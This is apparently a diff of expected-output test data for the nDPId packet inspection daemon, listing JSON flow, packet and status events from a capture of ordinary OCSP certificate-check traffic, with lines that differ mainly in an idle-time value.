+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223091709,"flow_last_seen":1623223091709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223091709,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623223091709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091709,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8XL5AAEAGBDzAqAGAl4uADoYkAFDUes8oAAAAAKAC+vBwKQAAAgQFtAQCCArLCQ4CAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACb3tkC"} 
+00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623223091736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091736,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAC8GcfqXi4AOwKgBgABQhiREDjpk1HrPKaAS\/\/+ohwAAAgQFtAQCCAp7mshzywkOAgEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvlhtb"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623223091739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091739,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0XL9AAEAGBEPAqAGAl4uADoYkAFDUes8pRA46ZYAQAfbVQAAAAQEICssJDiB7mshzGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApa33FQ=="} +00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":158,"packets-processed":157,"total-skipped-flows":0,"total-l4-data-len":15999,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1623226796047} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226796047,"flow_last_seen":1623226796047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1623226796047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796047,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8IiFAAEAGHJ3AqAGAXbjcHbsgAFDKwHZTAAAAAKAC+vANzwAAAgQFtAQCCArJnn0eAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC2uJMq"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1623226796050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796050,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8OIIAADgGTjxduNwdwKgBgABQuyB0cdYZysB2VKAS\/\/931wAAAgQFtAQCCAqXTK79yZ59HgEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApvHVR"} 
-00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1623226796054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623226796054,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0IiJAAEAGHKTAqAGAXbjcHbsgAFDKwHZUdHHWGoAQAfakpwAAAQEICsmefSaXTK79GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5srZww=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226796047,"flow_last_seen":1623226796047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1623226796047,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796047,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8IiFAAEAGHJ3AqAGAXbjcHbsgAFDKwHZTAAAAAKAC+vANzwAAAgQFtAQCCArJnn0eAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC2uJMq"} 
+00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1623226796050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796050,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8OIIAADgGTjxduNwdwKgBgABQuyB0cdYZysB2VKAS\/\/931wAAAgQFtAQCCAqXTK79yZ59HgEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApvHVR"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1623226796054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623226796054,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0IiJAAEAGHKTAqAGAXbjcHbsgAFDKwHZUdHHWGoAQAfakpwAAAQEICsmefSaXTK79GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5srZww=="} +00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":208,"packets-processed":207,"total-skipped-flows":0,"total-l4-data-len":19557,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1623227471703} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227471703,"flow_last_seen":1623227471703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1623227471703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471703,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CDlAAEAGLKrAqAGANFUPXMDmAFDpM3mLAAAAAKAC+vAljwAAAgQFtAQCCArD2jnWAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU0JsT"} -00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1623227471715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471715,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8PJoAAPMGhUg0VQ9cwKgBgABQwOYt\/4+26TN5jKAS\/\/9VQwAAAgQFoAQCCAoCPQtLw9o51gEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrMGLg"} 
-00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1623227471719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227471719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0CDpAAEAGLLHAqAGANFUPXMDmAFDpM3mMLf+Pt4AQAfaB9gAAAQEICsPaOecCPQtLGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY2fOA=="} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227472211,"flow_last_seen":1623227472211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227472211,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1623227472211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472211,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8cDxAAEAGbm3AqAGAl2UCheoSAFClxR9VAAAAAKAC+vA6IAAAAgQFtAQCCApcSasVAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAbRut"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1623227472214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472214,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADYG6KmXZQKFwKgBgABQ6hJzFOMDpcUfVqAS\/\/9zqQAAAgQFTAQCCAoCSmlaXEmrFQEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkey68"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1623227472218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227472218,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0cD1AAEAGbnTAqAGAl2UCheoSAFClxR9WcxTjBIAQAfagEQAAAQEIClxJqx0CSmlaGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyO91A=="} 
-00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227471703,"flow_last_seen":1623227471703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1623227471703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471703,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CDlAAEAGLKrAqAGANFUPXMDmAFDpM3mLAAAAAKAC+vAljwAAAgQFtAQCCArD2jnWAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU0JsT"} +00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1623227471715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471715,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8PJoAAPMGhUg0VQ9cwKgBgABQwOYt\/4+26TN5jKAS\/\/9VQwAAAgQFoAQCCAoCPQtLw9o51gEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrMGLg"} 
+00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1623227471719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227471719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0CDpAAEAGLLHAqAGANFUPXMDmAFDpM3mMLf+Pt4AQAfaB9gAAAQEICsPaOecCPQtLGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY2fOA=="} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227472211,"flow_last_seen":1623227472211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227472211,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
